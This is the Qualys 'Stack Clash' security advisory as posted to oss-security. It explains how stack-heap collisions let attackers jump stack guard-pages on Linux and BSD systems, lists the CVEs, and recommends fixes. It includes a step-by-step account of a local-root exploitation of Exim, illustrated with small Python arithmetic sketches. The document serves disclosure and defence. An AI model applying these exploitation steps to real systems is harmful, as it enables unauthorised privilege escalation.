[oss-security] Qualys Security Advisory - The Stack Clash
Qualys Security Advisory
2017-06-19 15:28:43 UTC
Qualys Security Advisory

The Stack Clash


========================================================================
Contents
========================================================================

I. Introduction
II. Problem
II.1. Automatic stack expansion
II.2. Stack guard-page
II.3. Stack-clash exploitation
III. Solutions
IV. Results
IV.1. Linux
IV.2. OpenBSD
IV.3. NetBSD
IV.4. FreeBSD
IV.5. Solaris
V. Acknowledgments


========================================================================
I. Introduction
========================================================================

Our research started with a 96-megabyte surprise:

b97bb000-b97dc000 rw-p 00000000 00:00 0 [heap]
bf7c6000-bf806000 rw-p 00000000 00:00 0 [stack]

and a 12-year-old question: "If the heap grows up, and the stack grows
down, what happens when they clash? Is it exploitable? How?"
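The size of that surprise can be read directly off the two maps lines above. The gap runs from the end of the [heap] region to the start of the [stack] region. Here is a minimal Python sketch, assuming the usual /proc/<pid>/maps layout (hexadecimal start-end addresses, end exclusive):

```python
def parse_range(maps_line):
    """Return (start, end) from a /proc/<pid>/maps line; end is exclusive."""
    start, end = maps_line.split()[0].split("-")
    return int(start, 16), int(end, 16)

heap = "b97bb000-b97dc000 rw-p 00000000 00:00 0 [heap]"
stack = "bf7c6000-bf806000 rw-p 00000000 00:00 0 [stack]"

_, heap_end = parse_range(heap)
stack_start, _ = parse_range(stack)
gap = stack_start - heap_end          # unmapped space between heap and stack
print(f"{gap:#x} bytes = {gap / 2**20:.1f} MB")  # 0x5fea000 bytes = 95.9 MB
```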

- In 2005, Gael Delalleau presented "Large memory management
vulnerabilities" and the first stack-clash exploit in user-space
(against mod_php 4.3.0 on Apache 2.0.53):

http://cansecwest.com/core05/memory_vulns_delalleau.pdf

- In 2010, Rafal Wojtczuk published "Exploiting large memory management
vulnerabilities in Xorg server running on Linux", the second
stack-clash exploit in user-space (CVE-2010-2240):

http://www.invisiblethingslab.com/resources/misc-2010/xorg-large-memory-attacks.pdf

- Since 2010, security researchers have exploited several stack-clashes
in kernel-space; for example:

https://jon.oberheide.org/blog/2010/11/29/exploiting-stack-overflows-in-the-linux-kernel/
https://jon.oberheide.org/files/infiltrate12-thestackisback.pdf
https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html

In user-space, however, this problem has been greatly underestimated;
the only public exploits are Gael Delalleau's and Rafal Wojtczuk's, and
they were written before Linux introduced a protection against
stack-clashes (a "guard-page" mapped below the stack):

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2240

In this advisory, we show that stack-clashes are widespread in
user-space, and exploitable despite the stack guard-page; we discovered
multiple vulnerabilities in guard-page implementations, and devised
general methods for:

- "Clashing" the stack with another memory region: we allocate memory
until the stack reaches another memory region, or until another memory
region reaches the stack;

- "Jumping" over the stack guard-page: we move the stack-pointer from
the stack and into the other memory region, without accessing the
stack guard-page;

- "Smashing" the stack, or the other memory region: we overwrite the
stack with the other memory region, or the other memory region with
the stack.

To illustrate our findings, we developed the following exploits and
proofs-of-concept:

- a local-root exploit against Exim (CVE-2017-1000369, CVE-2017-1000376)
on i386 Debian;

- a local-root exploit against Sudo (CVE-2017-1000367, CVE-2017-1000366)
on i386 Debian, Ubuntu, CentOS;

- an independent Sudoer-to-root exploit against CVE-2017-1000367 on any
SELinux-enabled distribution;

- a local-root exploit against ld.so and most SUID-root binaries
(CVE-2017-1000366, CVE-2017-1000370) on i386 Debian, Fedora, CentOS;

- a local-root exploit against ld.so and most SUID-root PIEs
(CVE-2017-1000366, CVE-2017-1000371) on i386 Debian, Ubuntu, Fedora;

- a local-root exploit against /bin/su (CVE-2017-1000366,
CVE-2017-1000365) on i386 Debian;

- a proof-of-concept that gains eip control against Sudo on i386
grsecurity/PaX (CVE-2017-1000367, CVE-2017-1000366, CVE-2017-1000377);

- a local proof-of-concept that gains rip control against Exim
(CVE-2017-1000369) on amd64 Debian;

- a local-root exploit against ld.so and most SUID-root binaries
(CVE-2017-1000366, CVE-2017-1000379) on amd64 Debian, Ubuntu, Fedora,
CentOS;

- a proof-of-concept against /usr/bin/at on i386 OpenBSD, for
CVE-2017-1000372 in OpenBSD's stack guard-page implementation and
CVE-2017-1000373 in OpenBSD's qsort() function;

- a proof-of-concept for CVE-2017-1000374 and CVE-2017-1000375 in
NetBSD's stack guard-page implementation;

- a proof-of-concept for CVE-2017-1085 in FreeBSD's setrlimit()
RLIMIT_STACK implementation;

- two proofs-of-concept for CVE-2017-1083 and CVE-2017-1084 in FreeBSD's
stack guard-page implementation;

- a local-root exploit against /usr/bin/rsh (CVE-2017-3630,
CVE-2017-3629, CVE-2017-3631) on Solaris 11.


========================================================================
II. Problem
========================================================================

Note: in this advisory, the "start of the stack" is the lowest address
of its memory region, and the "end of the stack" is the highest address
of its memory region; we do not use the ambiguous terms "top of the
stack" and "bottom of the stack".

========================================================================
II.1. Automatic stack expansion
========================================================================

The user-space stack of a process is automatically expanded by the
kernel:

- if the stack-pointer (the esp register, on i386) reaches the start of
the stack and the unmapped memory pages below (the stack grows down,
on i386),

- then a "page-fault" exception is raised and caught by the kernel,

- and the page-fault handler transparently expands the user-space stack
of the process (it decreases the start address of the stack),

- or it terminates the process with a SIGSEGV if the stack expansion
fails (for example, if the RLIMIT_STACK is reached).

Unfortunately, this stack expansion mechanism is implicit and fragile:
it relies on page-fault exceptions, but if another memory region is
mapped directly below the stack, then the stack-pointer can move from
the stack into the other memory region without raising a page-fault,
and:

- the kernel cannot tell that the process needed more stack memory;

- the process cannot tell that its stack-pointer moved from the stack
into another memory region.
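The decision the page-fault handler makes can be modelled in a few lines. The following is a toy Python sketch, not kernel code. The Layout class, its field names, and the assumption of a single region below the stack are illustrative, and real kernels apply further checks. It shows that an access into a region mapped directly below the stack raises no page-fault at all, so nothing gets a chance to intervene:

```python
from enum import Enum

PAGE = 4096

class Outcome(Enum):
    NO_FAULT = "no page-fault"
    EXPANDED = "page-fault, stack expanded"
    SIGSEGV = "page-fault, expansion failed"

class Layout:
    """Toy model: [stack_start, stack_end) is the stack, every address below
    below_end belongs to one other mapped region, and the gap in between is
    unmapped."""

    def __init__(self, below_end, stack_start, stack_end, rlimit):
        self.below_end = below_end
        self.stack_start = stack_start
        self.stack_end = stack_end
        self.rlimit = rlimit  # RLIMIT_STACK, in bytes

    def touch(self, addr):
        """Outcome of an access to addr (assumed below stack_end)."""
        if addr >= self.stack_start or addr < self.below_end:
            # Mapped memory: no page-fault, so neither the kernel nor the
            # process can tell that the stack-pointer left the stack.
            return Outcome.NO_FAULT
        new_start = addr - addr % PAGE
        if self.stack_end - new_start > self.rlimit:
            return Outcome.SIGSEGV
        self.stack_start = new_start  # the handler lowers the stack's start
        return Outcome.EXPANDED

MB = 2**20
gap = Layout(0x08000000, 0x08100000, 0x08200000, rlimit=8 * MB)
print(gap.touch(0x080FF010))    # Outcome.EXPANDED
clash = Layout(0x08100000, 0x08100000, 0x08200000, rlimit=8 * MB)
print(clash.touch(0x080FF010))  # Outcome.NO_FAULT (silently in the other region)
```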

In contrast, the heap expansion mechanism is explicit and robust: the
process uses the brk() system-call to tell the kernel that it needs more
heap memory, and the kernel expands the heap accordingly (it increases
the end address of the heap memory region -- the heap always grows up).

========================================================================
II.2. Stack guard-page
========================================================================

The fragile stack expansion mechanism poses a security threat: if the
stack-pointer of a process can move from the stack into another memory
region (which ends exactly where the stack starts) without raising a
page-fault, then:

- the process uses this other memory region as if it were an extension
of the stack;

- a write to this stack extension smashes the other memory region;

- a write to the other memory region smashes the stack extension.

To protect against this security threat, the kernel maps a "guard-page"
below the start of the stack: one or more PROT_NONE pages (or unmappable
pages) that:

- raise a page-fault exception if accessed (before the stack-pointer can
move from the stack into another memory region);

- terminate the process with a SIGSEGV (because the page-fault handler
cannot expand the stack if another memory region is mapped directly
below).

Unfortunately, a stack guard-page of a few kilobytes is insufficient
(CVE-2017-1000364): if the stack-pointer "jumps" over the guard-page --
if it moves from the stack into another memory region without accessing
the guard-page -- then no page-fault exception is raised and the stack
extends into the other memory region.

This theoretical vulnerability was first described in Gael Delalleau's
2005 presentation (slides 24-29). In the present advisory, we discuss
its practicalities, and multiple vulnerabilities in stack guard-page
implementations (in OpenBSD, NetBSD, and FreeBSD), but we exclude
related vulnerabilities such as unbounded alloca()s and VLAs
(Variable-Length Arrays) that have been exploited in the past:

http://phrack.org/issues/63/14.html
http://blog.exodusintel.com/2013/01/07/who-was-phone/

========================================================================
II.3. Stack-clash exploitation
========================================================================

Must be a clash, there's no alternative.
--The Clash, "Kingston Advice"

Our exploits follow a series of four sequential steps -- each step
allocates memory that must not be freed before all steps are complete:

Step 1: Clash (the stack with another memory region)
Step 2: Run (move the stack-pointer to the start of the stack)
Step 3: Jump (over the stack guard-page, into the other memory region)
Step 4: Smash (the stack, or the other memory region)

========================================================================
II.3.1. Step 1: Clash the stack with another memory region
========================================================================

Have the boys found the leak yet?
--The Clash, "The Leader"

Allocate memory until the start of the stack reaches the end of another
memory region, or until the end of another memory region reaches the
start of the stack.

- The other memory region can be, for example:
. the heap;
. an anonymous mmap();
. the read-write segment of ld.so;
. the read-write segment of a PIE, a Position-Independent Executable.

- The memory allocated in this Step 1 can be, for example:
. stack and heap memory;
. stack and anonymous mmap() memory;
. stack memory only.

- The heap and anonymous mmap() memory can be:

. temporarily allocated, but not freed before the stack guard-page is
jumped over in Step 3 and memory is smashed in Step 4;

. permanently leaked. On Linux, a general method for allocating
anonymous mmap()s is the LD_AUDIT memory leak that we discovered in
the ld.so part of the glibc, the GNU C Library (CVE-2017-1000366).

- The stack memory can be allocated, for example:

. through megabytes of command-line arguments and environment
variables.

On Linux, this general method for allocating stack memory is limited
by the kernel to 1/4 of the current RLIMIT_STACK (1GB on i386 if
RLIMIT_STACK is RLIM_INFINITY -- man execve, "Limits on size of
arguments and environment").

However, as we were drafting this advisory, we realized that the
kernel imposes this limit on the argument and environment strings,
but not on the argv[] and envp[] pointers to these strings, and we
developed alternative versions of our Linux exploits that do not
depend on application-specific memory leaks (CVE-2017-1000365).

. through recursive function calls.

On BSD, we discovered a general method for allocating megabytes of
stack memory: a vulnerability in qsort() that causes this function
to recurse N/4 times, given a pathological input array of N elements
(CVE-2017-1000373 in OpenBSD, CVE-2017-1000378 in NetBSD, and
CVE-2017-1082 in FreeBSD).

- In a few rare cases, Step 1 is not needed, because another memory
region is naturally mapped directly below the stack (for example,
ld.so in our Solaris exploit).

========================================================================
II.3.2. Step 2: Move the stack-pointer to the start of the stack
========================================================================

Run, run, run, run, run, don't you know?
--The Clash, "Three Card Trick"

Consume the unused stack memory that separates the stack-pointer from
the start of the stack. This Step 2 is similar to Step 3 ("Jump over the
stack guard-page") but is needed because:

- the stack-pointer is usually several kilobytes higher than the start
of the stack (functions that allocate a large stack-frame decrease the
start address of the stack, but this address is never increased
again); moreover:

. the FreeBSD kernel automatically expands the user-space stack of a
process by multiples of 128KB (SGROWSIZ, in vm_map_growstack());

. the Linux kernel initially expands the user-space stack of a process
by 128KB (stack_expand, in setup_arg_pages()).

- in Step 3, the stack-based buffer used to jump over the guard-page:

. is usually not large enough to simultaneously move the stack-pointer
to the start of the stack, and then into another memory region;

. must not be fully written to (a full write would access the stack
guard-page and terminate the process) but the stack memory consumed
in this Step 2 can be fully written to (for example, strdupa() can
be used in Step 2, but not in Step 3).

The stack memory consumed in this Step 2 can be, for example:

- large stack-frames, alloca()s, or VLAs (which can be detected by
grsecurity/PaX's STACKLEAK plugin for GCC,
https://grsecurity.net/features.php);

- recursive function calls (which can be detected by GNU cflow,
http://www.gnu.org/software/cflow/);

- on Linux, we discovered that the argv[] and envp[] arrays of pointers
can be used to consume the 128KB of initial stack expansion, because
the kernel allocates these arrays on the stack long after the call to
setup_arg_pages(); this general method for completing Step 2 is
exploitable locally, but the initial stack expansion poses a major
obstacle to the remote exploitation of stack-clashes, as mentioned in
IV.1.1.
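As a rough illustration of the argv[]/envp[] method, the number of pointers needed to fill the 128KB of initial stack expansion depends only on the pointer size. This sketch ignores argc, the NULL terminators, and the auxiliary vector, which the kernel also places there. pointers_to_fill() is a hypothetical helper:

```python
KB = 1024
INITIAL_STACK_EXPANSION = 128 * KB  # stack_expand, in setup_arg_pages()

def pointers_to_fill(nbytes, pointer_size):
    """How many argv[]/envp[] pointers occupy at least nbytes of stack."""
    return -(-nbytes // pointer_size)  # ceiling division

print(pointers_to_fill(INITIAL_STACK_EXPANSION, 4))  # i386:  32768
print(pointers_to_fill(INITIAL_STACK_EXPANSION, 8))  # amd64: 16384
```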

In a few rare cases, Step 2 is not needed, because the stack-pointer is
naturally close to the start of the stack (for example, in Exim's main()
function, the 256KB group_list[] moves the stack-pointer to the start of
the stack and beyond).

========================================================================
II.3.3. Step 3: Jump over the stack guard-page, into another memory
region
========================================================================

You need a little jump of electrical shockers.
--The Clash, "Clash City Rockers"

Move the stack-pointer from the stack and into the memory region that
clashed with the stack in Step 1, but without accessing the guard-page.
To complete this Step 3, a large stack-based buffer, alloca(), or VLA is
needed, and:

- it must be larger than the guard-page;

- it must end in the stack, above the guard-page;

- it must start in the memory region below the stack guard-page;

- it must not be fully written to (a full write would access the
guard-page, raise a page-fault exception, and terminate the process,
because the memory region mapped directly below the stack prevents the
page-fault handler from expanding the stack).
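The four conditions above can be written as a predicate. This simplified Python model makes several assumptions: a single contiguous guard-page at [guard_start, guard_end), a buffer written from its lowest address upward (as a memcpy() or strcpy() into it would be), no other write landing in the guard-page, and hypothetical addresses. jumps_guard_page() is an illustrative name:

```python
def jumps_guard_page(sp, size, written, guard_start, guard_end):
    """Simplified model of the Step 3 conditions.

    Allocating the buffer moves the stack-pointer from sp down to sp - size,
    so the buffer occupies [sp - size, sp), and only its lowest `written`
    bytes are written to; the guard-page occupies [guard_start, guard_end).
    """
    buf_start = sp - size
    return (size > guard_end - guard_start           # larger than the guard-page
            and sp > guard_end                       # ends in the stack, above it
            and buf_start < guard_start              # starts in the region below
            and buf_start + written <= guard_start)  # written part stays below it

GUARD = (0x10000, 0x11000)  # hypothetical one-page (4KB) guard-page
print(jumps_guard_page(0x12000, 0x8000, 0x100, *GUARD))   # True
print(jumps_guard_page(0x12000, 0x8000, 0x8000, *GUARD))  # False: full write
```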

In a few cases, Step 3 is not needed:

- on FreeBSD, a stack guard-page is implemented but disabled by default
(CVE-2017-1083);

- on OpenBSD, NetBSD, and FreeBSD, we discovered implementation
vulnerabilities that eliminate the stack guard-page (CVE-2017-1000372,
CVE-2017-1000374, CVE-2017-1084).

On Linux, we devised general methods for jumping over the stack
guard-page (CVE-2017-1000366):

- The glibc's __dcigettext() function alloca()tes single_locale, a
stack-based buffer as long as the LANGUAGE environment variable (up to
128KB, MAX_ARG_STRLEN, man execve), if the current locale is neither
"C" nor "POSIX" (a common case, because distributions install default
locales such as "C.UTF-8" and "en_US.utf8").

If LANGUAGE is mostly composed of ':' characters, then single_locale
is barely written to, and can be used to jump over the stack
guard-page.

Moreover, if __dcigettext() finds the message to be translated, then
_nl_find_msg() strdup()licates the OUTPUT_CHARSET environment variable
and allows a local attacker to immediately smash the stack and gain
control of the instruction pointer (the eip register, on i386), as
detailed in Step 4a.

We exploited this stack-clash against Sudo and su, but most of the
SUID (set-user-ID) and SGID (set-group-ID) binaries that call
setlocale(LC_ALL, "") and __dcigettext() or its derivatives (the
*gettext() functions, the _() convenience macro, the strerror()
function) are exploitable.

- The glibc's vfprintf() function (called by the *printf() family of
functions) alloca()tes a stack-based work buffer of up to 64KB
(__MAX_ALLOCA_CUTOFF) if a width or precision is greater than 1KB
(WORK_BUFFER_SIZE).

If the corresponding format specifier is %s then this work buffer is
never written to and can be used to jump over the stack guard-page.

None of our exploits is based on this method, but it was one of our
ideas to exploit Exim remotely, as mentioned in IV.1.1.

- The glibc's getaddrinfo() function calls gaih_inet(), which
alloca()tes tmpbuf, a stack-based buffer of up to 64KB
(__MAX_ALLOCA_CUTOFF) that may be used to jump over the stack
guard-page.

Moreover, gaih_inet() calls the gethostbyname*() functions, which
malloc()ate a heap-based DNS response of up to 64KB (MAXPACKET) that
may allow a remote attacker to immediately smash the stack, as
detailed in Step 4a.

None of our exploits is based on this method, but it may be the key to
the remote exploitation of stack-clashes.

- The glibc's run-time dynamic linker ld.so alloca()tes llp_tmp, a
stack-based copy of the LD_LIBRARY_PATH environment variable. If
LD_LIBRARY_PATH contains Dynamic String Tokens (DSTs), they are first
expanded: llp_tmp can be larger than 128KB (MAX_ARG_STRLEN) and not
fully written to, and can therefore be used to jump over the stack
guard-page and smash the memory region mapped directly below, as
detailed in Step 4b.

We exploited this ld.so stack-clash in two data-only attacks that
bypass NX (No-eXecute) and ASLR (Address Space Layout Randomization)
and obtain a privileged shell through most SUID and SGID binaries on
most i386 Linux distributions.

- Several local and remote applications allocate a 256KB stack-based
"gid_t buffer[NGROUPS_MAX];" that is not fully written to and can be
used to move the stack-pointer to the start of the stack (Step 2) and
jump over the guard-page (Step 3); for example, Exim's main() function
and older versions of util-linux's su.

None of our exploits is based on this method, but an experimental
version of our Exim exploit unexpectedly gained control of eip after
the group_list[] buffer had jumped over the stack guard-page.
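The 256KB figure follows from Linux's NGROUPS_MAX and the size of gid_t. Here is a quick check, assuming the Linux values (65536 supplementary groups, 32-bit gid_t):

```python
KB = 1024
NGROUPS_MAX = 65536  # Linux value (<linux/limits.h>)
SIZEOF_GID_T = 4     # gid_t is a 32-bit unsigned integer on Linux

buffer_size = NGROUPS_MAX * SIZEOF_GID_T  # gid_t buffer[NGROUPS_MAX]
print(buffer_size // KB)         # 256
print(buffer_size > 128 * KB)    # True: larger than the initial stack expansion
```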

========================================================================
II.3.4. Step 4: Either smash the stack with another memory region (Step
4a) or smash another memory region with the stack (Step 4b)
========================================================================

Smash and grab, it's that kind of world.
--The Clash, "One Emotion"

In Step 3, a function allocates a large stack-based buffer and jumps
over the stack guard-page into the memory region mapped directly below;
in Step 4, before this function returns and jumps back into the stack:

- Step 4a: a write to the memory region mapped below the stack (where
esp still points to) effectively smashes the stack. We exploit this
general method for completing Step 4 in Exim, Sudo, and su:

. we overwrite a return-address on the stack and gain control of eip;

. we return-into-libc (into system() or __libc_dlopen()) to defeat NX;

. we brute-force ASLR (8 bits of entropy) if CVE-2016-3672 is patched;

. we bypass SSP (Stack-Smashing Protector) because we overwrite the
return-address of a function that is not protected by a stack canary
(the memcpy() that smashes the stack usually overwrites its own
stack-frame and return-address).

- Step 4b: a write to the stack effectively smashes the memory region
mapped below (where esp still points to). This second method for
completing Step 4 is application-specific (it depends on the contents
of the memory region that we smash) unless we exploit the run-time
dynamic linker ld.so:

. on Solaris, we devised a general method for smashing ld.so's
read-write segment, overwriting one of its function pointers, and
executing our own shell-code;

. on Linux, we exploited most SUID and SGID binaries through ld.so:
our "hwcap" exploit smashes an mmap()ed string, and our ".dynamic"
exploit smashes a PIE's read-write segment before it is mprotect()ed
read-only by Full RELRO (Full RELocate Read-Only -- GNU_RELRO and
BIND_NOW).


========================================================================
III. Solutions
========================================================================

Based on our research, we recommend that the affected operating systems:

- Increase the size of the stack guard-page to at least 1MB, and allow
system administrators to easily modify this value (for example,
grsecurity/PaX introduced /proc/sys/vm/heap_stack_gap in 2010).

This first, short-term solution is cheap, but it can be defeated by a
very large stack-based buffer.

- Recompile all userland code (ld.so, libraries, binaries) with GCC's
"-fstack-check" option, which prevents the stack-pointer from moving
into another memory region without accessing the stack guard-page (it
writes one word to every 4KB page allocated on the stack).

This second, long-term solution is expensive, but it cannot be
defeated (even if the stack guard-page is only 4KB, one page) --
unless a vulnerability is discovered in the implementation of the
stack guard-page or the "-fstack-check" option.
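The idea behind the second solution can be modelled as follows. Whenever the stack-pointer moves down by size bytes, one word is written in every page crossed, so no whole page in between can be skipped, including a guard-page. This Python sketch models only the probing idea. GCC's actual code generation for -fstack-check differs in its details (probe interval, first and last probe), and probe_addresses() and touches_guard() are hypothetical names:

```python
PAGE = 4096

def probe_addresses(sp, size, page=PAGE):
    """Addresses written when the stack-pointer moves from sp down to
    sp - size: one word per page, from the top down, then the new sp."""
    new_sp = sp - size
    probes = list(range(sp - page, new_sp, -page))
    probes.append(new_sp)
    return probes

def touches_guard(sp, size, guard_start, guard_end):
    return any(guard_start <= a < guard_end for a in probe_addresses(sp, size))

# A 32KB allocation across a hypothetical guard-page at [0x10000, 0x11000):
print(touches_guard(0x12000, 0x8000, 0x10000, 0x11000))  # True
```

Because consecutive probes are at most one page apart, every page lying entirely between the old and the new stack-pointer receives at least one write. This is why, in this model, even a one-page guard-page is sufficient.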


========================================================================
IV. Results
========================================================================

========================================================================
IV.1. Linux
========================================================================

========================================================================
IV.1.1. Exim
========================================================================

Debian 8.5

Crude exploitation

Our first exploit, a Local Privilege Escalation against Exim's SUID-root
PIE (Position-Independent Executable) on i386 Debian 8.5, simply follows
the four sequential steps outlined in II.3.

Step 1: Clash the stack with the heap

To reach the start of the stack with the end of the heap (man brk), we
permanently leak memory through multiple -p command-line arguments that
are malloc()ated by Exim but never free()d (CVE-2017-1000369) -- we call
such a malloc()ated chunk of heap memory a "memleak-chunk".

Because the -p argument strings are originally allocated on the stack by
execve(), we must cover half of the initial heap-stack distance (between
the start of the heap and the end of the stack) with stack memory, and
half of this distance with heap memory.

If we set the RLIMIT_STACK to 136MB (MIN_GAP, arch/x86/mm/mmap.c) then
the initial heap-stack distance is minimal (randomized in a [96MB,137MB]
range), but we cannot reach the stack with the heap because of the 1/4
limit imposed by the kernel on the argument and environment strings (man
execve): 136MB/4=34MB of -p argument strings cannot cover 96MB/2=48MB,
half of the minimum heap-stack distance.

Moreover, if we increase the RLIMIT_STACK, the initial heap-stack
distance also increases and we still cannot reach the stack with the
heap. However, if we set the RLIMIT_STACK to RLIM_INFINITY (4GB on i386)
then the kernel switches from the default top-down mmap() layout to a
legacy bottom-up mmap() layout, and:

- the initial heap-stack distance is approximately 2GB, because the
start of the heap (the initial brk()) is randomized above the address
0x40000000, and the end of the stack is randomized below the address
0xC0000000;

- we can reach the stack with the heap, despite the 1/4 limit imposed by
the kernel on the argument and environment strings, because 4GB/4=1GB
of -p argument strings can cover 2GB/2=1GB, half of the initial
heap-stack distance;

- we clash the stack with the heap around the address 0x80000000.
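The arithmetic of this Step 1 can be checked directly. The sketch below uses a hypothetical helper, strings_can_cover(), to encode the two constraints described above. First, each -p string occupies both stack and heap memory, so the strings must cover half of the initial heap-stack distance. Second, the kernel caps the strings at 1/4 of RLIMIT_STACK. Distances are the approximate figures quoted above, ignoring randomization:

```python
MB, GB = 2**20, 2**30

def strings_can_cover(rlimit_stack, heap_stack_distance):
    """Each -p string lives on the stack (execve) and on the heap (Exim's
    malloc() copy), so the strings must cover half of the distance; the
    kernel caps them at 1/4 of RLIMIT_STACK."""
    return rlimit_stack // 4 >= heap_stack_distance // 2

print(strings_can_cover(136 * MB, 96 * MB))  # False: 34MB < 48MB
print(strings_can_cover(4 * GB, 2 * GB))     # True: 1GB >= 1GB

# Legacy bottom-up layout: heap above ~0x40000000, stack below ~0xC0000000;
# covering half the distance from each side meets around 0x80000000.
heap_start, stack_end = 0x40000000, 0xC0000000
print(hex(heap_start + (stack_end - heap_start) // 2))  # 0x80000000
```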

Step 2: Move the stack-pointer (esp) to the start of the stack

The 256KB stack-based group_list[] in Exim's main() naturally consumes
the 128KB of initial stack expansion, as mentioned in II.3.2.

Step 3: Jump over the stack guard-page and into the heap

To move esp from the start of the stack into the heap, without accessing
the stack guard-page, we use a malformed -d command-line argument that
is written to the 32KB (STRING_SPRINTF_BUFFER_SIZE) stack-based buffer
in Exim's string_sprintf() function. This buffer is not fully written to
and hence does not access the stack guard-page, because our -d argument
string is much shorter than 32KB.

Step 4a: Smash the stack with the heap

Before string_sprintf() returns (and moves esp from the heap back into
the stack) it calls string_copy(), which malloc()ates and memcpy()es our
-d argument string to the end of the heap, where esp still points to --
we call this malloc()ated chunk of heap memory the "smashing-chunk".

This call to memcpy() therefore smashes its own stack-frame (which is
not protected by SSP) with the contents of our smashing-chunk, and we
overwrite memcpy()'s return-address with the address of libc's system()
function (which is not randomized by ASLR because Debian 8.5 is
vulnerable to CVE-2016-3672):

- instead of smashing memcpy()'s stack-frame with an 8-byte pattern (the
return-address to system() and its argument) we smash it with a simple
4-byte pattern (the return-address to system()), append "." to the
PATH environment variable, and symlink() our exploit to the string
that begins at the address of libc's system() function;

- system() does not drop our escalated root privileges, because Debian's
/bin/sh is dash, not bash (which drops them unless it is invoked with
its -p option, man bash).

This first version of our Exim exploit obtained a root-shell after
nearly a week of failed attempts; to improve this result, we analyzed
every step of a successful run.

Refined exploitation

Step 1: Clash the stack with the heap

+ The heap must be able to reach the stack [Condition 1]

The start of the heap is randomized in the 32MB range above the end of
Exim's PIE (the end of its .bss section), but the growth of the heap is
sometimes blocked by libraries that are mmap()ed within the same range
(because of the legacy bottom-up mmap() layout). On Debian 8.5, Exim's
libraries occupy about 8MB and thus block the growth of the heap with a
probability of 8MB/32MB = 1/4.

When the heap is blocked by the libraries, malloc() switches from brk()
to mmap()s of 1MB (MMAP_AS_MORECORE_SIZE), and our memory leak reaches
the stack with mmap()s instead of the heap. Such a stack-clash is also
exploitable, but its probability of success is low, as detailed in
IV.1.6., and we therefore discarded this approach.

+ The heap must always reach the stack, when not blocked by libraries

Because the initial heap-stack distance (between the start of the heap
and the end of the stack) is a random variable:

- either we allocate the exact amount of heap memory to cover the mean
heap-stack distance, but the probability of success of this approach
is low and we therefore discarded it;

- or we allocate enough heap memory to always reach the stack, even when
the initial heap-stack distance is maximal; after the heap reaches the
stack, our memory leak allocates mmap()s of 1MB above the stack (below
0xC0000000) and below the heap (above the libraries), but it must not
exhaust the address-space (the 1GB below 0x40000000 is unmappable);

- the final heap-stack distance (between the end of the heap and the
start of the stack) is also a random variable:

. its minimum value is 8KB (the stack guard-page, plus a safety page
imposed by the brk() system-call in mm/mmap.c);

. its maximum value is roughly the size of a memleak-chunk, plus 128KB
(DEFAULT_TOP_PAD, malloc/malloc.c).

Step 3: Jump over the stack guard-page and into the heap

- The stack-pointer must jump over the guard-page and land into the free
chunk at the end of the heap (the remainder of the heap after malloc()
switches from brk() to mmap()), where both the smashing-chunk and
memcpy()'s stack-frame are allocated and overwritten in Step 4a
[Condition 2];

- The write (of approximately smashing-chunk bytes) to
string_sprintf()'s stack-based buffer (which starts where the
guard-page jump lands) must not crash into the end of the heap
[Condition 3].

Step 4a: Smash the stack with the heap

The smashing-chunk must be allocated into the free chunk at the end of
the heap:

- the smashing-chunk must not be allocated into the free chunks left
over at the end of the 1MB mmap()s [Condition 4];

- the memleak-chunks must not be allocated into the free chunk at the
end of the heap [Condition 5].

Intuitively, the probability of gaining control of eip depends on the
size of the smashing-chunk (the guard-page jump's landing-zone) and the
size of the memleak-chunks (which determines the final heap-stack
distance).

To maximize this probability, we wrote a helper program that imposes the
following conditions on the smashing-chunk and memleak-chunks:

- the smashing-chunk must be smaller than 32KB
(STRING_SPRINTF_BUFFER_SIZE) [Condition 3];

- the memleak-chunks must be smaller than 128KB (DEFAULT_MMAP_THRESHOLD,
malloc/malloc.c);

- the free chunk at the end of the heap must be larger than twice the
smashing-chunk size [Conditions 2 and 3];

- the free chunk at the end of the heap must be smaller than the
memleak-chunk size [Condition 5];

- when the final heap-stack distance is minimal, the 32KB
(STRING_SPRINTF_BUFFER_SIZE) guard-page jump must land below the free
chunk at the end of the heap [Condition 2];

- the free chunks at the end of the 1MB mmap()s must be:

. either smaller than the smashing-chunk [Condition 4];

. or larger than the free chunk at the end of the heap (glibc's
malloc() is a best-fit allocator) [Condition 4].

The resulting smashing-chunk and memleak-chunk sizes are:

smash: 10224 memleak: 27656 brk_min: 20464 brk_max: 24552 mmap_top: 25304
probability: 1/16 (0.06190487817)
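The helper program itself is not part of this advisory, but the published sizes can be checked against the inequalities listed above. The Python sketch below rests on an assumed reading of its output: brk_min and brk_max bound the free chunk at the end of the heap, and mmap_top is the free chunk left at the end of each 1MB mmap(). Under that reading, and ignoring malloc's per-chunk bookkeeping, mmap_top is exactly 1MB modulo the memleak-chunk size. The landing condition for a minimal final heap-stack distance is not modelled. satisfies_conditions() is a hypothetical name:

```python
KB = 1024
STRING_SPRINTF_BUFFER_SIZE = 32 * KB
DEFAULT_MMAP_THRESHOLD = 128 * KB
MMAP_AS_MORECORE_SIZE = 1024 * KB   # the 1MB mmap()s

def satisfies_conditions(smash, memleak, brk_min, brk_max, mmap_top):
    """Check the listed inequalities, under the assumed reading that
    [brk_min, brk_max] bounds the free chunk at the end of the heap and
    mmap_top is the free chunk at the end of each 1MB mmap()."""
    return (smash < STRING_SPRINTF_BUFFER_SIZE           # Condition 3
            and memleak < DEFAULT_MMAP_THRESHOLD         # not mmap()ed one by one
            and brk_min > 2 * smash                      # Conditions 2 and 3
            and brk_max < memleak                        # Condition 5
            and (mmap_top < smash or mmap_top > brk_max))  # Condition 4

print(MMAP_AS_MORECORE_SIZE % 27656)                            # 25304
print(satisfies_conditions(10224, 27656, 20464, 24552, 25304))  # True
```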

In theory, the probability of gaining control of eip is 1/21: the
product of the 1/16 probability calculated by this helper program
(approximately (smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD))) and
the 3/4 probability of reaching the stack with the heap [Condition 1].
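The two probabilities combine as follows. This sketch only reproduces the arithmetic quoted above: DEFAULT_TOP_PAD is glibc's 128KB default, and the 3/4 comes from the 8MB of libraries in the 32MB heap range (Condition 1):

```python
KB = 1024
DEFAULT_TOP_PAD = 128 * KB          # glibc malloc default
smash, memleak = 10224, 27656

approx = smash / (memleak + DEFAULT_TOP_PAD)   # the approximation quoted above
helper = 0.06190487817                          # printed by the helper program
reach = 1 - 8 / 32      # Condition 1: 8MB of libraries in the 32MB heap range

print(f"1/{1 / approx:.1f}")            # 1/15.5, i.e. about 1/16
print(f"1/{1 / (helper * reach):.1f}")  # 1/21.5, quoted as 1/21
```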

